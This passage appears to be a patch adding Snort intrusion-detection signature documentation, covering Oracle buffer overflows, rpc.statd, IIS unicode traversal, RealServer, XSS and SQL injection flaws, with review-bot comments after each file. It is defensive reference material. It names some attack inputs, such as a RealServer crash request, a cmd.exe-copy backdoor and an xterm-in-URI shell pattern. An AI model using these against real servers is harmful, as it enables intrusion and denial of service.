+Upgrade to the latest non-affected version of the software.
+
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
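Review bot: "unavailble" in Detailed Information should be "unavailable", and "needs to login" in Attack Scenarios should be "needs to log in". Additional References is empty for a vulnerability with a specific affected-version list; a vendor or Bugtraq reference would help. The "Sid: " label carries a trailing space.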
--- /dev/null
+++ b/doc/signatures/2894.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2894
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
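Review bot: the last Detailed Information sentence is broken across lines as "drop_priority" followed by a line starting with ". This procedure", which looks like a template substitution that kept the line break; join it as "vulnerability in the procedure drop_priority. This procedure is included in sys.dbms_repcat_conf." "Oracle Oracle9i" under Affected Systems duplicates the vendor name. "Rule: ", "Sid: " and the "-- " separators carry trailing whitespace, and Additional References is empty.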
--- /dev/null
+++ b/doc/signatures/2147.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 2147
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in the BLNews php application. 
+
+--
+Impact:
+Arbitrary code execution.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a vulnerability in the BLNews PHP application.
+
+It is possible for an attacker to include a PHP file of his choosing via a URL, the script is processed and executed with the privileges of the user running the webserver.
+
+--
+Affected Systems:
+Any host using BLNews.
+
+--
+Attack Scenarios:
+An attacker could include a PHP file of his choice by including the file name in a URI supplied to the webserver that would in turn process the script.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host.
+
+Check the webserver log files for signs of this activity.
+
+Where possible, ensure the webserver is run as an unprivileged process.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/7677
+
+--
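Review bot: the Sid label and value share one line ("Sid: 2147") followed by two blank lines, unlike every other file in this patch, which puts the value on its own line; match the common layout in case anything parses these files. "BLNews php application" in the Summary and "BLNews PHP application" in Detailed Information should agree. The second Detailed Information sentence is a comma splice ("...via a URL, the script is processed..."); split it. "Check the php implementation on the host." is too vague to act on; say what to check (for example, whether the PHP configuration allows remote files to be included).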
--- /dev/null
+++ b/doc/signatures/2912.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2912
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure register_snapshot_repgroup
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
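Review bot: same line-break problem as 2894.txt in this patch: "register_snapshot_repgroup" is followed by a line beginning ". This procedure"; join it into one sentence ending "sys.dbms_repcat_sna." "Oracle Oracle9i" duplicates the vendor name, the "Rule: ", "Sid: " and "-- " lines carry trailing whitespace, and Additional References is empty.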
--- /dev/null
+++ b/doc/signatures/1913.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1916
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a format
+string vulnerability associated with the Remote Procedure Call (RPC)
+rpc.statd.
+
+--
+Impact:
+Remote root access. This may permit execution of arbitrary commands with
+the privileges of root.
+
+--
+Detailed Information:
+The rpc.statd daemon is a component of Network File System (NFS) that
+implements the Network Status and Monitor (NSM) RPC functions.  NSM
+monitors the status of NFS clients and servers and maintains a list of
+hosts that have registered to be notified when an NFS host crashes. 
+There is a format string vulnerability associated with the code that
+implements the monitoring of a given host, possibly permitting the
+execution of arbitrary commands with the privileges of root. 
+
+--
+Affected Systems:
+	Conectiva Linux 4.0, 4.1, 4.2, 5.0, 5.1
+	Debian Linux 2.2, 2.3
+	Red Hat Linux 6.0, 6.1, 6.2
+	SuSE Linux 6.3, 6.4, 7.0
+	Trustix Secure Linux 1.0, 1.1
+
+--
+Attack Scenarios:
+An attacker can attempt to exploit the format string error allowing
+execution of arbitrary commands with the privileges of root.  
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
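Review bot: the file is doc/signatures/1913.txt but the Sid field says 1916; one of the two is wrong, and a documentation lookup keyed on SID will miss this file or describe the wrong rule. Verify against the rule's sid option before merging. Lines in the Detailed Information, Attack Scenarios and Ease of Attack sections end in trailing whitespace, and Additional References is empty for a format string bug with a specific affected-distribution list.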
--- /dev/null
+++ b/doc/signatures/278.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+278
+
+--
+Summary:
+This event is generated when a remote attacker transmits a malformed request for a page on a web server port, which can indicate a Denial of Service (DoS) attack on a RealNetworks RealServer.
+
+--
+Impact:
+The RealNetworks RealServer service will crash.
+
+--
+Detailed Information:
+RealNetworks RealServer is a server application that serves streaming audio to clients. When an attacker sends a request for a template file in the /viewsource/ directory with an empty variable value, RealServer crashes.   
+
+--
+Affected Systems:
+Systems running RealNetworks RealServer 7.0 with View Source functionality enabled.
+
+--
+Attack Scenarios:
+An attacker sends an HTTP request for /viewsource/template.html? on a RealServer audio server. RealServer crashes, stopping audio transmission.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If a legitimate remote user attempts to use the View Source function on RealServer, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest version of the software or disable the View Source functionality. The vendor has issued an advisory, workarounds, and downloadable patches at http://service.real.com/help/faq/servgviewsrc.html.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+RealNetworks
+http://service.real.com/help/faq/servgviewsrc.html
+
+
+--
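Review bot: the vendor URL appears twice, inline in Corrective Action and again under Additional References; the other files in this patch keep links in the references and point to them from the text. The Detailed Information line ends in trailing spaces, and there are two blank lines before the final separator.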
--- /dev/null
+++ b/doc/signatures/1147.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1147
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
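Review bot: apart from the Sid value this file is identical to 1588.txt and 1576.txt in this patch, so it documents nothing specific to SID 1147; at minimum the Summary should name the file or URI the rule matches. Same trailing whitespace on the Summary, Impact and Detailed Information lines, and "attackers choosing" needs the possessive.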
--- /dev/null
+++ b/doc/signatures/820.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+820
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
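Review bot: "ona web server" in Detailed Information should be "on a web server", and "attackers choosing" (Impact and Detailed Information) needs the possessive. The line ending "...can be exploited by the attacker." runs well past the wrap width used in the rest of the file; rewrap it. The Summary refers to "a known vulnerability in a CGI web application" without naming the application, so the alert is not actionable from this text alone.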
--- /dev/null
+++ b/doc/signatures/989.txt
@@ -0,0 +1,63 @@
+Changed message since it really didn't reflect what was happening
+Rule:
+
+--
+Sid:
+989
+
+--
+Summary:
+This event is generated when an attempt is made to access the sensepost.exe file. 
+
+--
+Impact:
+Remote access. This attack may permit the execution of arbitrary commands on the vulnerable server. 
+
+--
+Detailed Information:
+A vulnerability associated Microsoft Internet Information Services (IIS) servers allows an attacker to escape the web root directory (inetpub) permitting navigation to unauthorized directories.  This vulnerability is exploitable by encoding characters in unicode because unauthorized directory traversal is not examined after the unicode decoding.  A widely available script exploits this vulnerability and copies the \winnt\system32\cmd.exe file to \inetpub\scripts\sensepost.exe, essentially allowing an attacker to execute arbitrary commands on the vulnerable host even after the patch has been applied. 
+
+--
+Affected Systems:
+Microsoft IIS 4.0, 5.0 
+
+--
+Attack Scenarios:
+An attacker can attempt to access the sensepost.exe file to execute arbitrary commands on the exploited server. 
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patch referenced in the Microsoft link.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0884
+
+Bugtraq
+http://www.securityfocus.com/bid/1806
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms00-078.asp
+
+--
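Review bot: the first line, "Changed message since it really didn't reflect what was happening", is a change note placed above "Rule:" and will ship inside the documentation file; it belongs in the changelog. "A vulnerability associated Microsoft Internet Information Services" is missing "with". The Corrective Action ("Apply the patch") is incomplete by the file's own account: Detailed Information states that the copied sensepost.exe keeps working "even after the patch has been applied", so the action should also say to look for and remove the copied file in the scripts directory and to check the host for other signs of compromise.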
--- /dev/null
+++ b/doc/signatures/848.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+848
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
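Review bot: the Affected Systems section is empty; either list products or state what Detailed Information already describes, web, web application and FTP servers that do not validate the requested file path. Attack Scenarios mentions only the "ftp root directory" while Detailed Information covers web servers too; align the two. "Apply the appropriate vendor supplied patches" lacks a full stop, the first Attack Scenarios line and the "-- " separator carry trailing whitespace, and there are two blank lines under Additional References.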
--- /dev/null
+++ b/doc/signatures/100000829.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000829
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "HiveMail" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "name" parameter in the "address.view.php" script used by the "HiveMail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using HiveMail
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
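Review bot: same Impact problem as 100000653.txt in this patch: the paragraph claims system integrity compromise and arbitrary code execution on the server, while Detailed Information and Attack Scenarios describe a cross site scripting link that steals information from the user who clicks it; restate the Impact for the client-side risk. The file starts with two blank lines before "Rule:", and the Sid value and the Affected Systems line lack the blank line before "--" used elsewhere.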
--- /dev/null
+++ b/doc/signatures/1576.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1576
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
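Review bot: the Summary and Detailed Information never say what this rule matches, so a reader cannot tell sid 1576 apart from the other generic web-attack entries; "exploit a known vulnerability on a web server" plus an empty Additional References section gives an analyst nothing to triage with. Suggest naming the URI or content pattern the rule looks for, the product it targets and at least one reference. Also strip the trailing whitespace on the "known ", "code of " and "the " lines, and "attackers choosing" needs an apostrophe.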
--- /dev/null
+++ b/doc/signatures/100000800.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000800
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Pivot" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "name" parameter in the "editor_menu.php" script used by the "Pivot" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Pivot
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
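Review bot: the file opens with two blank lines before "Rule:" and the Sid value is not followed by the blank line the other entries place before "--"; please normalise to the layout of, for example, 1576.txt. Content-wise, the Impact paragraph is the same server-compromise boilerplate as the other XSS entries and does not fit a cross-site scripting flaw in the "name" parameter of editor_menu.php, whose Attack Scenarios describe information theft from a user who clicks a link; consider describing the client-side impact instead.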
--- /dev/null
+++ b/doc/signatures/100000700.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000700
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Vincent Leclercq News" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "disable" parameter in the "diver.php" script used by the "Vincent Leclercq News" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Vincent Leclercq News
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
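Review bot: the application is called "Vincent Leclercq News" here but "Vincent-Leclercq News" in 100000726.txt for the same diver.php script; pick one spelling so the two entries can be found together. Same layout points as the other 1000007xx/1000008xx files: two leading blank lines before "Rule:", no blank line after the Sid value or after the Affected Systems and Contributors blocks, and "attackers choosing" needs an apostrophe.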
--- /dev/null
+++ b/doc/signatures/2517.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2517
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of the Private
+Communications Transport (PCT) protocol.
+
+--
+Impact:
+Execution of arbitrary code. Unauthorized administrative access to an
+affected host.
+
+--
+Detailed Information:
+A vulnerability exists in the handling of PCT requests that
+can be manipulated to give an attacker the opportunity to execute
+arbitrary code of their choosing leading to a possible remote
+administrative compromize of an affected host.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003 and XP systems using PCT
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted PCT request to an affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the use of PCT
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
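Review bot: typos in Detailed Information and Attack Scenarios: "compromize" should be "compromise" and "attcker" should be "attacker". The two Corrective Action lines ("Apply the appropriate vendor supplied patches", "Disable the use of PCT") lack full stops, and "Disable the use of PCT" would be more useful with a pointer to the vendor advisory describing how, especially since Additional References is empty. The Affected Systems line is tab-indented while most other files in this patch use no indent.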
--- /dev/null
+++ b/doc/signatures/1847.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1847
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
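Review bot: the body of this file is word-for-word identical to 1576.txt (Summary, Impact, Detailed Information, Attack Scenarios, Contributors), so the only difference between the two documents is the Sid. If the two rules match different things, each entry should say what its own rule looks for; if they match the same thing, a single shared text would avoid the duplication. Same trailing whitespace on the "known ", "code of " and "the " lines as in 1576.txt.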
--- /dev/null
+++ b/doc/signatures/1362.txt
@@ -0,0 +1,59 @@
+Rule: 
+
+--
+Sid: 
+1362
+
+-- 
+Summary:
+A web command execution attack involving the use of a
+"xterm" command
+
+-- 
+Impact: 
+Possible intelligence gathering activity or an attempt to gain elevated privileges on the server by using xterm to open another connection.
+
+-- 
+Detailed Information: 
+The attacker may have gained the ability to execute system commands remotely or the web server may be incorrectly configured to allow such access.
+
+This rule generates an event when a "xterm" command is used over a plain-text (unencrypted) connection on one of the specified web ports to the target web server. The "xterm" command may be used establish an interactive shell session to the machine.
+
+The rule looks for the "xterm" command in the client to web server network traffic and does not indicate whether the command was actually successful. The presence of the "xterm" command in the URI indicates that an attacker attempted to trick the web server into executing system in non-interactive mode i.e. without a valid shell session.
+
+Alternatively this rule may generate an event in an unencrypted HTTP tunneling connection to the server or a shell connection via another exploit against the web server.
+
+-- 
+Attack Scenarios: 
+An attacker uses a "xterm" command to open an interactive session then uses that session to move a rootkit to the system.
+
+--
+Ease of Attack: 
+Simple. No exploit software required
+
+-- 
+False Positives: 
+Any string containing '/usr/X11R6/bin/xterm
+' in the URL will trigger the alarm.
+
+--
+False Negatives: 
+none known
+
+-- 
+Corrective Action: 
+Check the web server software for vulnerabilities and possible upgrades or patches for the system to the latest version of the web software, also investigate the server logs for signs of compromise
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. Disallowing execution of this binary via a URI is suggested.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+
+-- 
+Additional References:
+
+--
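Review bot: several wording errors in Detailed Information: "may be used establish" is missing "to", "executing system in non-interactive mode" is missing "commands", and "a "xterm"" should be "an "xterm"" (also in Summary and Attack Scenarios). The False Positives entry has a line break inside the quoted string ("'/usr/X11R6/bin/xterm" then "' in the URL"), splitting the path from its closing quote; rejoin it onto one line. "it's designated web root" should be "its", "none known" should match the capitalised "None known" used elsewhere, and the first Corrective Action paragraph is one run-on sentence that should be split. This file also has no Affected Systems section, and there is trailing whitespace after "Rule:", "Sid:", several section headers and several "--" separators.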
--- /dev/null
+++ b/doc/signatures/2596.txt
@@ -0,0 +1,68 @@
+Rule:
+
+
+--
+Sid:
+2596
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the Mail Transfer Agent Exim.
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code on a vulnerable
+server with the privilege of the process running Exim.
+
+--
+Detailed Information:
+Exim is vulnerable to a buffer overflow, permitting an attacker to execute
+arbitrary code.  The vulnerability may be exploited if Exim is configured to
+verify header syntax in the e-mail message body.  This is not the default
+configuration.  If an attacker supplies a large number of spaces after certain
+header fields, it may be possible to cause a buffer overflow.
+
+--
+Affected Systems:
+Exim prior to version 4.34
+
+--
+Attack Scenarios:
+An attacker can create and send mail with a malformed header,
+possibly causing a buffer overflow and permitting the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/10291
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0400
+
+Other:
+http://www.guninski.com/exim1.html
+
+--
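Review bot: the "Additional References" header is missing its colon (every other file has "Additional References:"), and blank-line usage is inconsistent: two blank lines after "Rule:" and after the Sid value, none between "None known." under False Negatives and the following "--". The Corrective Action ("Upgrade to the latest non-affected version of the software.") could name the concrete fix already implied by Affected Systems, Exim 4.34 or later, and could repeat the mitigating detail from Detailed Information that the vulnerable path is only reached when header syntax verification in the message body is enabled, which is not the default.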
--- /dev/null
+++ b/doc/signatures/100000726.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000726
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Vincent-Leclercq News" application running on a webserver. Access to the file "diver.php" with SQL commands being passed as the "id" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
